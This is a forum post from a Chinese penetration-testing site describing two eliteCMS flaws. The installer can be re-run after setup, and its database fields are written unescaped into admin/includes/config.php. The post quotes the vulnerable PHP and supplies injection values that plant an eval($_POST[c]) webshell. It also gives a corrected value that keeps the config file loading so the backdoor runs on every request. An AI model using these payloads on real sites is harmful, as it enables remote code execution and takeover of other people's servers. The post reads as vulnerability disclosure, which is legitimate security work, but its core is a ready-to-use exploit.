中国网络渗透测试联盟

Title: eliteCMS installer not locked after setup + one-liner webshell write vulnerability

Author: admin    Time: 2012-11-18 13:59
The eliteCMS installer is not locked after installation finishes, so an attacker can open the installer URL again and re-run the installation.

The second vulnerability is that the installer writes its values straight into admin/includes/config.php, which lets an attacker write a one-liner webshell into that file.

Let us look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at the code that stores those values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken from the POST request without any validation or escaping, and they are interpolated directly into the double-quoted PHP source of config.php. If the database name sent in the POST request is:

"?><?php eval($_POST[c]);?><?php

a one-liner backdoor is written into /admin/includes/config.php. One caveat: with this exact value the generated file no longer parses, because the leading quote closes the string literal without the "); that define() still needs, and the trailing <?php reopens PHP mode in front of the rest of the line. A value such as elite");?><?php eval($_POST[c]);?><?php // closes the define() cleanly and comments out the remainder of the line, so config.php keeps loading and the eval() runs on every request that includes it. If magic_quotes_gpc is enabled, the quote is escaped and the injection fails.
5 k8 l! F. f  v$ f! ~




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2